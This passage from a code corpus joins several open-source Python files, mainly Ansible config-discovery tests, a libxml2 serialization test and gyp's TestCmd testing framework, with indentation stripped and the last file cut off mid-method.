[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_in_cwd, cfg_file, alt_cfg_file)]],
indirect=['setup_existing_files'])
def test_no_warning_on_writable_if_env_used(self, setup_env, setup_existing_files, monkeypatch, expected):
"""If the cwd is writable but ANSIBLE_CONFIG was used, no warning should be issued"""
real_stat = os.stat
def _os_stat(path):
if path == working_dir:
from posix import stat_result
stat_info = list(real_stat(path))
stat_info[stat.ST_MODE] |= stat.S_IWOTH
return stat_result(stat_info)
else:
return real_stat(path)
monkeypatch.setattr('os.stat', _os_stat)
warnings = set()
assert find_ini_config_file(warnings) == expected
assert warnings == set()
# ANSIBLE_CONFIG not specified
@pytest.mark.parametrize('setup_env', [[None]], indirect=['setup_env'])
# All config files are present
@pytest.mark.parametrize('setup_existing_files',
[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_in_cwd, cfg_file, alt_cfg_file)]],
indirect=['setup_existing_files'])
def test_cwd_warning_on_writable_no_warning_set(self, setup_env, setup_existing_files, monkeypatch):
"""Smoketest that the function succeeds even though no warning set was passed in"""
real_stat = os.stat
def _os_stat(path):
if path == working_dir:
from posix import stat_result
stat_info = list(real_stat(path))
stat_info[stat.ST_MODE] |= stat.S_IWOTH
return stat_result(stat_info)
else:
return real_stat(path)
monkeypatch.setattr('os.stat', _os_stat)
assert find_ini_config_file() == cfg_in_homedir
|
racker/omnibus | refs/heads/master | source/libxml2-2.7.7/python/tests/cutnpaste.py | 87 | #!/usr/bin/python -u
import sys
import libxml2
# Memory debug specific
libxml2.debugMemory(1)
#
# Testing XML document serialization
#
source = libxml2.parseDoc("""<?xml version="1.0"?>
<root xmlns:foo="http://example.org/foo"
xmlns:bar="http://example.org/bar">
<include xmlns="http://example.org/include">
<fragment><foo:elem bar="tricky"/></fragment>
</include>
</root>
""")
target = libxml2.parseDoc("""<?xml version="1.0"?>
<root xmlns:foobar="http://example.org/bar"/>""")
fragment = source.xpathEval("//*[name()='fragment']")[0]
dest = target.getRootElement()
# do a cut and paste operation
fragment.unlinkNode()
dest.addChild(fragment)
# do the namespace fixup
dest.reconciliateNs(target)
# The source tree can be freed at that point
source.freeDoc()
# check the resulting tree
str = dest.serialize()
if str != """<root xmlns:foobar="http://example.org/bar" xmlns:default="http://example.org/include" xmlns:foo="http://example.org/foo"><default:fragment><foo:elem bar="tricky"/></default:fragment></root>""":
print "reconciliateNs() failed"
sys.exit(1)
target.freeDoc()
# Memory debug specific
libxml2.cleanupParser()
if libxml2.debugMemory(1) == 0:
print "OK"
else:
print "Memory leak %d bytes" % (libxml2.debugMemory(1))
libxml2.dumpMemory()
|
pschmitt/home-assistant | refs/heads/dev | homeassistant/components/russound_rio/__init__.py | 36 | """The russound_rio component."""
|
brson/gyp | refs/heads/master | test/lib/TestCmd.py | 330 | """
TestCmd.py: a testing framework for commands and scripts.
The TestCmd module provides a framework for portable automated testing
of executable commands and scripts (in any language, not just Python),
especially commands and scripts that require file system interaction.
In addition to running tests and evaluating conditions, the TestCmd
module manages and cleans up one or more temporary workspace
directories, and provides methods for creating files and directories in
those workspace directories from in-line data, here-documents), allowing
tests to be completely self-contained.
A TestCmd environment object is created via the usual invocation:
import TestCmd
test = TestCmd.TestCmd()
There are a bunch of keyword arguments available at instantiation:
test = TestCmd.TestCmd(description = 'string',
program = 'program_or_script_to_test',
interpreter = 'script_interpreter',
workdir = 'prefix',
subdir = 'subdir',
verbose = Boolean,
match = default_match_function,
diff = default_diff_function,
combine = Boolean)
There are a bunch of methods that let you do different things:
test.verbose_set(1)
test.description_set('string')
test.program_set('program_or_script_to_test')
test.interpreter_set('script_interpreter')
test.interpreter_set(['script_interpreter', 'arg'])
test.workdir_set('prefix')
test.workdir_set('')
test.workpath('file')
test.workpath('subdir', 'file')
test.subdir('subdir', ...)
test.rmdir('subdir', ...)
test.write('file', "contents\n")
test.write(['subdir', 'file'], "contents\n")
test.read('file')
test.read(['subdir', 'file'])
test.read('file', mode)
test.read(['subdir', 'file'], mode)
test.writable('dir', 1)
test.writable('dir', None)
test.preserve(condition, ...)
test.cleanup(condition)
test.command_args(program = 'program_or_script_to_run',
interpreter = 'script_interpreter',
arguments = 'arguments to pass to program')
test.run(program = 'program_or_script_to_run',
interpreter = 'script_interpreter',
arguments = 'arguments to pass to program',
chdir = 'directory_to_chdir_to',
stdin = 'input to feed to the program\n')
universal_newlines = True)
p = test.start(program = 'program_or_script_to_run',
interpreter = 'script_interpreter',
arguments = 'arguments to pass to program',
universal_newlines = None)
test.finish(self, p)
test.pass_test()
test.pass_test(condition)
test.pass_test(condition, function)
test.fail_test()
test.fail_test(condition)
test.fail_test(condition, function)
test.fail_test(condition, function, skip)
test.no_result()
test.no_result(condition)
test.no_result(condition, function)
test.no_result(condition, function, skip)
test.stdout()
test.stdout(run)
test.stderr()
test.stderr(run)
test.symlink(target, link)
test.banner(string)
test.banner(string, width)
test.diff(actual, expected)
test.match(actual, expected)
test.match_exact("actual 1\nactual 2\n", "expected 1\nexpected 2\n")
test.match_exact(["actual 1\n", "actual 2\n"],
["expected 1\n", "expected 2\n"])
test.match_re("actual 1\nactual 2\n", regex_string)
test.match_re(["actual 1\n", "actual 2\n"], list_of_regexes)
test.match_re_dotall("actual 1\nactual 2\n", regex_string)
test.match_re_dotall(["actual 1\n", "actual 2\n"], list_of_regexes)
test.tempdir()
test.tempdir('temporary-directory')
test.sleep()
test.sleep(seconds)
test.where_is('foo')
test.where_is('foo', 'PATH1:PATH2')
test.where_is('foo', 'PATH1;PATH2', '.suffix3;.suffix4')
test.unlink('file')
test.unlink('subdir', 'file')
The TestCmd module provides pass_test(), fail_test(), and no_result()
unbound functions that report test results for use with the Aegis change
management system. These methods terminate the test immediately,
reporting PASSED, FAILED, or NO RESULT respectively, and exiting with
status 0 (success), 1 or 2 respectively. This allows for a distinction
between an actual failed test and a test that could not be properly
evaluated because of an external condition (such as a full file system
or incorrect permissions).
import TestCmd
TestCmd.pass_test()
TestCmd.pass_test(condition)
TestCmd.pass_test(condition, function)
TestCmd.fail_test()
TestCmd.fail_test(condition)
TestCmd.fail_test(condition, function)
TestCmd.fail_test(condition, function, skip)
TestCmd.no_result()
TestCmd.no_result(condition)
TestCmd.no_result(condition, function)
TestCmd.no_result(condition, function, skip)
The TestCmd module also provides unbound functions that handle matching
in the same way as the match_*() methods described above.
import TestCmd
test = TestCmd.TestCmd(match = TestCmd.match_exact)
test = TestCmd.TestCmd(match = TestCmd.match_re)
test = TestCmd.TestCmd(match = TestCmd.match_re_dotall)
The TestCmd module provides unbound functions that can be used for the
"diff" argument to TestCmd.TestCmd instantiation:
import TestCmd
test = TestCmd.TestCmd(match = TestCmd.match_re,
diff = TestCmd.diff_re)
test = TestCmd.TestCmd(diff = TestCmd.simple_diff)
The "diff" argument can also be used with standard difflib functions:
import difflib
test = TestCmd.TestCmd(diff = difflib.context_diff)
test = TestCmd.TestCmd(diff = difflib.unified_diff)
Lastly, the where_is() method also exists in an unbound function
version.
import TestCmd
TestCmd.where_is('foo')
TestCmd.where_is('foo', 'PATH1:PATH2')
TestCmd.where_is('foo', 'PATH1;PATH2', '.suffix3;.suffix4')
"""
# Copyright 2000-2010 Steven Knight
# This module is free software, and you may redistribute it and/or modify
# it under the same terms as Python itself, so long as this copyright message
# and disclaimer are retained in their original form.
#
# IN NO EVENT SHALL THE AUTHOR BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT,
# SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OF
# THIS CODE, EVEN IF THE AUTHOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
#
# THE AUTHOR SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE. THE CODE PROVIDED HEREUNDER IS ON AN "AS IS" BASIS,
# AND THERE IS NO OBLIGATION WHATSOEVER TO PROVIDE MAINTENANCE,
# SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
__author__ = "Steven Knight <knight at baldmt dot com>"
__revision__ = "TestCmd.py 0.37.D001 2010/01/11 16:55:50 knight"
__version__ = "0.37"
import errno
import os
import os.path
import re
import shutil
import stat
import string
import sys
import tempfile
import time
import traceback
import types
import UserList
__all__ = [
'diff_re',
'fail_test',
'no_result',
'pass_test',
'match_exact',
'match_re',
'match_re_dotall',
'python_executable',
'TestCmd'
]
try:
import difflib
except ImportError:
__all__.append('simple_diff')
def is_List(e):
return type(e) is types.ListType \
or isinstance(e, UserList.UserList)
try:
from UserString import UserString
except ImportError:
class UserString:
pass
if hasattr(types, 'UnicodeType'):
def is_String(e):
return type(e) is types.StringType \
or type(e) is types.UnicodeType \
or isinstance(e, UserString)
else:
def is_String(e):
return type(e) is types.StringType or isinstance(e, UserString)
tempfile.template = 'testcmd.'
if os.name in ('posix', 'nt'):
tempfile.template = 'testcmd.' + str(os.getpid()) + '.'
else:
tempfile.template = 'testcmd.'
re_space = re.compile('\s')
_Cleanup = []
_chain_to_exitfunc = None
def _clean():
global _Cleanup
cleanlist = filter(None, _Cleanup)
del _Cleanup[:]
cleanlist.reverse()
for test in cleanlist:
test.cleanup()
if _chain_to_exitfunc:
_chain_to_exitfunc()
try:
import atexit
except ImportError:
# TODO(1.5): atexit requires python 2.0, so chain sys.exitfunc
try:
_chain_to_exitfunc = sys.exitfunc
except AttributeError:
pass
sys.exitfunc = _clean
else:
atexit.register(_clean)
try:
zip
except NameError:
def zip(*lists):
result = []
for i in xrange(min(map(len, lists))):
result.append(tuple(map(lambda l, i=i: l[i], lists)))
return result
class Collector:
def __init__(self, top):
self.entries = [top]
def __call__(self, arg, dirname, names):
pathjoin = lambda n, d=dirname: os.path.join(d, n)
self.entries.extend(map(pathjoin, names))
def _caller(tblist, skip):
string = ""
arr = []
for file, line, name, text in tblist:
if file[-10:] == "TestCmd.py":
break
arr = [(file, line, name, text)] + arr
atfrom = "at"
for file, line, name, text in arr[skip:]:
if name in ("?", "<module>"):
name = ""
else:
name = " (" + name + ")"
string = string + ("%s line %d of %s%s\n" % (atfrom, line, file, name))
atfrom = "\tfrom"
return string
def fail_test(self = None, condition = 1, function = None, skip = 0):
"""Cause the test to fail.
By default, the fail_test() method reports that the test FAILED
and exits with a status of 1. If a condition argument is supplied,
the test fails only if the condition is true.
"""
if not condition:
return
if not function is None:
function()
of = ""
desc = ""
sep = " "
if not self is None:
if self.program:
of = " of " + self.program
sep = "\n\t"
if self.description:
desc = " [" + self.description + "]"
sep = "\n\t"
at = _caller(traceback.extract_stack(), skip)
sys.stderr.write("FAILED test" + of + desc + sep + at)
sys.exit(1)
def no_result(self = None, condition = 1, function = None, skip = 0):
"""Causes a test to exit with no valid result.
By default, the no_result() method reports NO RESULT for the test
and exits with a status of 2. If a condition argument is supplied,
the test fails only if the condition is true.
"""
if not condition:
return
if not function is None:
function()
of = ""
desc = ""
sep = " "
if not self is None:
if self.program:
of = " of " + self.program
sep = "\n\t"
if self.description:
desc = " [" + self.description + "]"
sep = "\n\t"
if os.environ.get('TESTCMD_DEBUG_SKIPS'):
at = _caller(traceback.extract_stack(), skip)
sys.stderr.write("NO RESULT for test" + of + desc + sep + at)
else:
sys.stderr.write("NO RESULT\n")
sys.exit(2)
def pass_test(self = None, condition = 1, function = None):
"""Causes a test to pass.
By default, the pass_test() method reports PASSED for the test
and exits with a status of 0. If a condition argument is supplied,
the test passes only if the condition is true.
"""
if not condition:
return
if not function is None:
function()
sys.stderr.write("PASSED\n")
sys.exit(0)
def match_exact(lines = None, matches = None):
"""
"""
if not is_List(lines):
lines = string.split(lines, "\n")
if not is_List(matches):
matches = string.split(matches, "\n")
if len(lines) != len(matches):
return
for i in range(len(lines)):
if lines[i] != matches[i]:
return
return 1
def match_re(lines = None, res = None):
"""
"""
if not is_List(lines):
lines = string.split(lines, "\n")
if not is_List(res):
res = string.split(res, "\n")
if len(lines) != len(res):
return
for i in range(len(lines)):
s = "^" + res[i] + "$"
try:
expr = re.compile(s)
except re.error, e:
msg = "Regular expression error in %s: %s"
raise re.error, msg % (repr(s), e[0])
if not expr.search(lines[i]):
return
return 1
def match_re_dotall(lines = None, res = None):
"""
"""
if not type(lines) is type(""):
lines = string.join(lines, "\n")
if not type(res) is type(""):
res = string.join(res, "\n")
s = "^" + res + "$"
try:
expr = re.compile(s, re.DOTALL)
except re.error, e:
msg = "Regular expression error in %s: %s"
raise re.error, msg % (repr(s), e[0])
if expr.match(lines):
return 1
try:
import difflib
except ImportError:
pass
else:
def simple_diff(a, b, fromfile='', tofile='',
fromfiledate='', tofiledate='', n=3, lineterm='\n'):
"""
A function with the same calling signature as difflib.context_diff
(diff -c) and difflib.unified_diff (diff -u) but which prints
output like the simple, unadorned 'diff" command.
"""
sm = difflib.SequenceMatcher(None, a, b)
def comma(x1, x2):
return x1+1 == x2 and str(x2) or '%s,%s' % (x1+1, x2)
result = []
for op, a1, a2, b1, b2 in sm.get_opcodes():
if op == 'delete':
result.append("%sd%d" % (comma(a1, a2), b1))
result.extend(map(lambda l: '< ' + l, a[a1:a2]))
elif op == 'insert':
result.append("%da%s" % (a1, comma(b1, b2)))
result.extend(map(lambda l: '> ' + l, b[b1:b2]))
elif op == 'replace':
result.append("%sc%s" % (comma(a1, a2), comma(b1, b2)))
result.extend(map(lambda l: '< ' + l, a[a1:a2]))
result.append('---')
result.extend(map(lambda l: '> ' + l, b[b1:b2]))
return result
def diff_re(a, b, fromfile='', tofile='',
fromfiledate='', tofiledate='', n=3, lineterm='\n'):
"""
A simple "diff" of two sets of lines when the expected lines
are regular expressions. This is a really dumb thing that
just compares each line in turn, so it doesn't look for
chunks of matching lines and the like--but at least it lets
you know exactly which line first didn't compare correctl...
"""
result = []
diff = len(a) - len(b)
if diff < 0:
a = a + ['']*(-diff)
elif diff > 0:
b = b + ['']*diff
i = 0
for aline, bline in zip(a, b):
s = "^" + aline + "$"
try:
expr = re.compile(s)
except re.error, e:
msg = "Regular expression error in %s: %s"
raise re.error, msg % (repr(s), e[0])
if not expr.search(bline):
result.append("%sc%s" % (i+1, i+1))
result.append('< ' + repr(a[i]))
result.append('---')
result.append('> ' + repr(b[i]))
i = i+1
return result
if os.name == 'java':
python_executable = os.path.join(sys.prefix, 'jython')
else:
python_executable = sys.executable
if sys.platform == 'win32':
default_sleep_seconds = 2
def where_is(file, path=None, pathext=None):
if path is None:
path = os.environ['PATH']
if is_String(path):
path = string.split(path, os.pathsep)
if pathext is None:
pathext = os.environ['PATHEXT']
if is_String(pathext):
pathext = string.split(pathext, os.pathsep)
for ext in pathext:
if string.lower(ext) == string.lower(file[-len(ext):]):
pathext = ['']
break
for dir in path:
f = os.path.join(dir, file)
for ext in pathext:
fext = f + ext
if os.path.isfile(fext):
return fext
return None
else:
def where_is(file, path=None, pathext=None):
if path is None:
path = os.environ['PATH']
if is_String(path):
path = string.split(path, os.pathsep)
for dir in path:
f = os.path.join(dir, file)
if os.path.isfile(f):
try:
st = os.stat(f)
except OSError:
continue
if stat.S_IMODE(st[stat.ST_MODE]) & 0111:
return f
return None
default_sleep_seconds = 1
try:
import subprocess
except ImportError:
# The subprocess module doesn't exist in this version of Python,
# so we're going to cobble up something that looks just enough
# like its API for our purposes below.
import new
subprocess = new.module('subprocess')
subprocess.PIPE = 'PIPE'
subprocess.STDOUT = 'STDOUT'
subprocess.mswindows = (sys.platform == 'win32')
try:
import popen2
popen2.Popen3
except AttributeError:
class Popen3:
universal_newlines = 1
def __init__(self, command, **kw):
if sys.platform == 'win32' and command[0] == '"':
command = '"' + command + '"'
(stdin, stdout, stderr) = os.popen3(' ' + command)
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
def close_output(self):
self.stdout.close()
self.resultcode = self.stderr.close()
def wait(self):
resultcode = self.resultcode
if os.WIFEXITED(resultcode):
return os.WEXITSTATUS(resultcode)
elif os.WIFSIGNALED(resultcode):
return os.WTERMSIG(resultcode)
else:
return None
else:
try:
popen2.Popen4
except AttributeError:
# A cribbed Popen4 class, with some retrofitted code from
# the Python 1.5 Popen3 class methods to do certain things
# by hand.
class Popen4(popen2.Popen3):
childerr = None
def __init__(self, cmd, bufsize=-1):
p2cread, p2cwrite = os.pipe()
c2pread, c2pwrite = os.pipe()
self.pid = os.fork()
if self.pid == 0:
# Child
os.dup2(p2cread, 0)
os.dup2(c2pwrite, 1)
os.dup2(c2pwrite, 2)
for i in range(3, popen2.MAXFD):
try:
os.close(i)
except: pass
try:
os.execvp(cmd[0], cmd)
finally:
os._exit(1)
# Shouldn't come here, I guess
os._exit(1)
os.close(p2cread)
self.tochild = os.fdopen(p2cwrite, 'w', bufsize)
os.close(c2pwrite)
self.fromchild = os.fdopen(c2pread, 'r', bufsize)
popen2._active.append(self)
popen2.Popen4 = Popen4
class Popen3(popen2.Popen3, popen2.Popen4):
universal_newlines = 1
def __init__(self, command, **kw):
if kw.get('stderr') == 'STDOUT':
apply(popen2.Popen4.__init__, (self, command, 1))
else:
apply(popen2.Popen3.__init__, (self, command, 1))
self.stdin = self.tochild
self.stdout = self.fromchild
self.stderr = self.childerr
def wait(self, *args, **kw):
resultcode = apply(popen2.Popen3.wait, (self,)+args, kw)
if os.WIFEXITED(resultcode):
return os.WEXITSTATUS(resultcode)
elif os.WIFSIGNALED(resultcode):
return os.WTERMSIG(resultcode)
else:
return None
subprocess.Popen = Popen3
# From Josiah Carlson,
# ASPN : Python Cookbook : Module to allow Asynchronous subprocess use on Windows and Posix platforms
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/440554
PIPE = subprocess.PIPE
if subprocess.mswindows:
from win32file import ReadFile, WriteFile
from win32pipe import PeekNamedPipe
import msvcrt
else:
import select
import fcntl
try: fcntl.F_GETFL
except AttributeError: fcntl.F_GETFL = 3
try: fcntl.F_SETFL
except AttributeError: fcntl.F_SETFL = 4
class Popen(subprocess.Popen):
def recv(self, maxsize=None):
return self._recv('stdout', maxsize)
def recv_err(self, maxsize=None):
return self._recv('stderr', maxsize)
def send_recv(self, input='', maxsize=None):
return self.send(input), self.recv(maxsize), self.recv_err(maxsize)
def get_conn_maxsize(self, which, maxsize):
if maxsize is None:
maxsize = 1024
elif maxsize < 1:
maxsize = 1
return getattr(self, which), maxsize
def _close(self, which):
getattr(self, which).close()
setattr(self, which, None)
if subprocess.mswindows:
def send(self, input):
if not self.stdin:
return None
try:
x = msvcrt.get_osfhandle(self.stdin.fileno())
(errCode, written) = WriteFile(x, input)
except ValueError:
return self._close('stdin')
except (subprocess.pywintypes.error, Exception), why:
if why[0] in (109, errno.ESHUTDOWN):
return self._close('stdin')
raise
return written
def _recv(self, which, maxsize):
conn, maxsize = self.get_conn_maxsize(which, maxsize)
if conn is None:
return None
try:
x = msvcrt.get_osfhandle(conn.fileno())
(read, nAvail, nMessage) = PeekNamedPipe(x, 0)
if maxsize < nAvail:
nAvail = maxsize
if nAvail > 0:
(errCode, read) = ReadFile(x, nAvail, None)
except ValueError:
return self._close(which)
except (subprocess.pywintypes.error, Exception), why:
if why[0] in (109, errno.ESHUTDOWN):
return self._close(which)
raise
#if self.universal_newlines:
# read = self._translate_newlines(read)
return read
else:
def send(self, input):
if not self.stdin:
return None
if not select.select([], [self.stdin], [], 0)[1]:
return 0
try:
written = os.write(self.stdin.fileno(), input)
except OSError, why:
if why[0] == errno.EPIPE: #broken pipe
return self._close('stdin')
raise
return written
def _recv(self, which, maxsize):
conn, maxsize = self.get_conn_maxsize(which, maxsize)
if conn is None:
return None
try:
flags = fcntl.fcntl(conn, fcntl.F_GETFL)
except TypeError:
flags = None
else:
if not conn.closed:
fcntl.fcntl(conn, fcntl.F_SETFL, flags| os.O_NONBLOCK)
try:
if not select.select([conn], [], [], 0)[0]:
return ''
r = conn.read(maxsize)
if not r:
return self._close(which)
#if self.universal_newlines:
# r = self._translate_newlines(r)
return r
finally:
if not conn.closed and not flags is None:
fcntl.fcntl(conn, fcntl.F_SETFL, flags)
disconnect_message = "Other end disconnected!"
def recv_some(p, t=.1, e=1, tr=5, stderr=0):
if tr < 1:
tr = 1
x = time.time()+t
y = []
r = ''
pr = p.recv
if stderr:
pr = p.recv_err
while time.time() < x or r:
r = pr()
if r is None:
if e:
raise Exception(disconnect_message)
else:
break
elif r:
y.append(r)
else:
time.sleep(max((x-time.time())/tr, 0))
return ''.join(y)
# TODO(3.0: rewrite to use memoryview()
def send_all(p, data):
while len(data):
sent = p.send(data)
if sent is None:
raise Exception(disconnect_message)
data = buffer(data, sent)
try:
object
except NameError:
class object:
pass
class TestCmd(object):
"""Class TestCmd
"""
def __init__(self, description = None,
program = None,
interpreter = None,
workdir = None,
subdir = None,
verbose = None,
match = None,
diff = None,
combine = 0,
universal_newlines = 1):
self._cwd = os.getcwd()
self.description_set(description)
self.program_set(program)
self.interpreter_set(interpreter)
if verbose is None:
try:
verbose = max( 0, int(os.environ.get('TESTCMD_VERBOSE', 0)) )
except ValueError:
verbose = 0
self.verbose_set(verbose)
self.combine = combine
self.universal_newlines = universal_newlines
if match is not None:
self.match_function = match
else:
self.match_function = match_re
if diff is not None:
self.diff_function = diff
else:
try:
difflib
except NameError:
pass
else:
self.diff_function = simple_diff
#self.diff_function = difflib.context_diff
#self.diff_function = difflib.unified_diff
self._dirlist = []
self._preserve = {'pass_test': 0, 'fail_test': 0, 'no_result': 0}
if os.environ.has_key('PRESERVE') and not os.environ['PRESERVE'] is '':
self._preserve['pass_test'] = os.environ['PRESERVE']
self._preserve['fail_test'] = os.environ['PRESERVE']
self._preserve['no_result'] = os.environ['PRESERVE']
else:
try:
self._preserve['pass_test'] = os.environ['PRESERVE_PASS']
except KeyError:
pass
try:
self._preserve['fail_test'] = os.environ['PRESERVE_FAIL']
except KeyError:
pass
try:
self._preserve['no_result'] = os.environ['PRESERVE_NO_RESULT']
except KeyError:
pass
self._stdout = []
self._stderr = []
self.status = None
self.condition = 'no_result'
self.workdir_set(workdir)
self.subdir(subdir)
def __del__(self):
self.cleanup()
def __repr__(self):
return "%x" % id(self)
banner_char = '='
banner_width = 80
def banner(self, s, width=None):
if width is None:
width = self.banner_width
return s + self.banner_char * (width - len(s))
if os.name == 'posix':
def escape(self, arg):
"escape shell special characters"
slash = '\\'
special = '"$'
arg = string.replace(arg, slash, slash+slash)
for c in special:
arg = string.replace(arg, c, slash+c)
if re_space.search(arg):
arg = '"' + arg + '"'
return arg
else:
# Windows does not allow special characters in file names
# anyway, so no need for an escape function, we will just quote
# the arg.
def escape(self, arg):
if re_space.search(arg):
arg = '"' + arg + '"'
return arg
def canonicalize(self, path):
if is_List(path):
path = apply(os.path.join, tuple(path))
if not os.path.isabs(path):
path = os.path.join(self.workdir, path)
return path
def chmod(self, path, mode):
"""Changes permissions on the specified file or directory
path name."""
path = self.canonicalize(path)
os.chmod(path, mode)
def cleanup(self, condition = None):
"""Removes any temporary working directories for the specified
TestCmd environment. If the environment variable PRESERVE was
set when the TestCmd environment was created, temporary working
directories are not removed. If any of the environment variables
PRESERVE_PASS, PRESERVE_FAIL, or PRESERVE_NO_RESULT were set
when the TestCmd environment was created, then temporary working
directories are not removed if the test passed, failed, or had
no result, respectively. Temporary working directories are also
preserved for conditions specified via the preserve method.
Typically, this method is not called directly, but is used when
the script exits to clean up temporary working directories as
appropriate for the exit status.
"""
if not self._dirlist:
return
os.chdir(self._cwd)
self.workdir = None
if condition is None:
condition = self.condition
if self._preserve[condition]:
for dir in self._dirlist:
print "Preserved directory", dir
else:
list = self._dirlist[:]
list.reverse()
for dir in list:
self.writable(dir, 1)
shutil.rmtree(dir, ignore_errors = 1)
self._dirlist = []
try:
global _Cleanup
_Cleanup.remove(self)
except (AttributeError, ValueError):
pass
def command_args(self, program = None,
interpreter = None,
arguments = None):
if program:
if type(program) == type('') and not os.path.isabs(program):
program = os.path.join(self._cwd, program)
else:
program = self.program
if not interpreter:
interpreter = self.interpreter
if not type(program) in [type([]), type(())]:
program = [program]
cmd = list(program)
if interpreter:
if not type(interpreter) in [type([]), type(())]:
interpreter = [interpreter]
cmd = list(interpreter) + cmd
if arguments:
if type(arguments) == type(''):
arguments = string.split(arguments)
cmd.extend(arguments)
return cmd
def description_set(self, description):
"""Set the description of the functionality being tested.
"""
self.description = description
try:
difflib
except NameError:
def diff(self, a, b, name, *args, **kw):
print self.banner('Expected %s' % name)
print a
print self.banner('Actual %s' % name)
print b
else:
def diff(self, a, b, name, *args, **kw):
print self.banner(name)
args = (a.splitlines(), b.splitlines()) + args
lines = apply(self.diff_function, args, kw)
for l in lines:
print l
def fail_test(self, condition = 1, function = None, skip = 0):
"""Cause the test to fail.
"""
if not condition:
return
self.condition = 'fail_test'
fail_test(self = self,
condition = condition,
function = function,
skip = skip)
def interpreter_set(self, interpreter):
"""Set the program to be used to interpret the program
under test as a script.
"""
self.interpreter = interpreter
def match(self, lines, matches):
"""Compare actual and expected file contents.
"""
return self.match_function(lines, matches)
def match_exact(self, lines, matches):
"""Compare actual and expected file contents.
"""
return match_exact(lines, matches)
def match_re(self, lines, res):
"""Compare actual and expected file contents.
"""
return match_re(lines, res)
def match_re_dotall(self, lines, res):
"""Compare actual and expected file contents.
"""
return match_re_dotall(lines, res)
def no_result(self, condition = 1, function = None, skip = 0):
"""Report that the test could not be run.
"""
if not condition:
return
self.condition = 'no_result'
no_result(self = self,
condition = condition,
function = function,
skip = skip)
def pass_test(self, condition = 1, function = None):
"""Cause the test to pass.
"""
if not condition:
return
self.condition = 'pass_test'
pass_test(self = self, condition = condition, function = function)
def preserve(self, *conditions):
"""Arrange for the temporary working directories for the
specified TestCmd environment to be preserved for one or more
conditions. If no conditions are specified, arranges for
the temporary working directories to be preserved for all
conditions.
"""
if conditions is ():
conditions = ('pass_test', 'fail_test', 'no_result')
for cond in conditions:
self._preserve[cond] = 1
def program_set(self, program):
"""Set the executable program or script to be tested.
"""
if program and not os.path.isabs(program):
program = os.path.join(self._cwd, program)
self.program = program
def read(self, file, mode = 'rb'):
"""Reads and returns the contents of the specified file name.
The file name may be a list, in which case the elements are
concatenated with the os.path.join() method. The file is
assumed to be under the temporary working directory unless it
is an absolute path name. The I/O mode for the file may
be specified; it must begin with an 'r'. The default is
'rb' (binary read).
"""
file = self.canonicalize(file)
if mode[0] != 'r':
raise ValueError, "mode must begin with 'r'"
with open(file, mode) as f:
result = f.read()
return result
def rmdir(self, dir):
"""Removes the specified dir name.
The dir name may be a list, in which case the elements are
concatenated with the os.path.join() method. The dir is
assumed to be under the temporary working directory unless it
is an absolute path name.
The dir must be empty.
"""
dir = self.canonicalize(dir)
os.rmdir(dir)
def start(self, program = None,
interpreter = None,
arguments = None,
universal_newlines = None,
**kw):
"""
Starts a program or script for the test environment.
The specified program will have the original directory
prepended unless it is enclosed in a [list].
"""
cmd = self.command_args(program, interpreter, arguments)
cmd_string = string.join(map(self.escape, cmd), ' ')
if self.verbose:
sys.stderr.write(cmd_string + "\n")
if universal_newlines is None:
universal_newlines = self.universal_newlines
# On Windows, if we make stdin a pipe when we plan to send
# no input, and the test program exits before
# Popen calls msvcrt.open_osfhandle, that call will fail.
# So don't use a pipe for stdin if we don't need one.
stdin = kw.get('stdin', None)
if stdin is not None:
stdin = subprocess.PIPE
combine = kw.get('combine', self.combine)
if combine:
stderr_value = subprocess.STDOUT
else:
stderr_value = subprocess.PIPE
return Popen(cmd,
stdin=stdin,
stdout=subprocess.PIPE,
stderr=stderr_value,
universal_newlines=universal_newlines)
def finish(self, popen, **kw):
"""
Finishes and waits for the process being run under control of
the specified popen argument, recording the exit status,
standard output and error output.
"""
popen.stdin.close()
self.status = popen.wait()
if not self.status:
self.status = 0
self._stdout.append(popen.stdout.read())
if popen.stderr:
stderr = popen.stderr.read()
else:
stderr = ''
self._stderr.append(stderr)
def run(self, program = None,
interpreter = None,
arguments = None,
chdir = None,
stdin = None,
universal_newlines = None):
"""Runs a test of the program or script for the test
environment. Standard output and error output are saved for
future retrieval via the stdout() and stderr() methods.
The specified program will have the original directory
prepended unless it is enclosed in a [list].
"""
if chdir:
oldcwd = os.getcwd()
if not os.path.isabs(chdir):
chdir = os.path.join(self.workpath(chdir))
if self.verbose:
sys.stderr.write("chdir(" + chdir + ")\n")
os.chdir(chdir)
p = self.start(program,
interpreter,
arguments,
universal_newlines,
stdin=stdin)
if stdin:
if is_List(stdin):
for line in stdin:
p.stdin.write(line)
else:
p.stdin.write(stdin)
p.stdin.close()
out = p.stdout.read()
if p.stderr is None:
err = ''
else:
err = p.stderr.read()
try:
close_output = p.close_output
except AttributeError:
p.stdout.close()
if not p.stderr is None:
p.stderr.close()
else:
close_output()
self._stdout.append(out)
self._stderr.append(err)
self.status = p.wait()
if not self.status:
self.status = 0
if chdir:
os.chdir(oldcwd)
if self.verbose >= 2:
write = sys.stdout.write
write('============ STATUS: %d\n' % self.status)
out = self.stdout()
if out or self.verbose >= 3:
write('============ BEGIN STDOUT (len=%d):\n' % len(out))
write(out)
write('============ END STDOUT\n')
err = self.stderr()
if err or self.verbose >= 3:
write('============ BEGIN STDERR (len=%d)\n' % len(err))
write(err)
write('============ END STDERR\n')
def sleep(self, seconds = default_sleep_seconds):
"""Sleeps at least the specified number of seconds. If no
number is specified, sleeps at least the minimum number of
seconds necessary to advance file time stamps on the current
system. Sleeping more seconds is all right.
"""
time.sleep(seconds)
def stderr(self, run = None):
"""Returns the error output from the specified run number.
If there is no specified run number, then returns the error
output of the last run. If the run number is less than zero,
then returns the error output from that many runs back from the
current run.
"""
if not run:
run = len(self._stderr)
elif run < 0:
run = len(self._stderr) + run
run = run - 1
return self._stderr[run]
def stdout(self, run = None):
"""Returns the standard output from the specified run number.
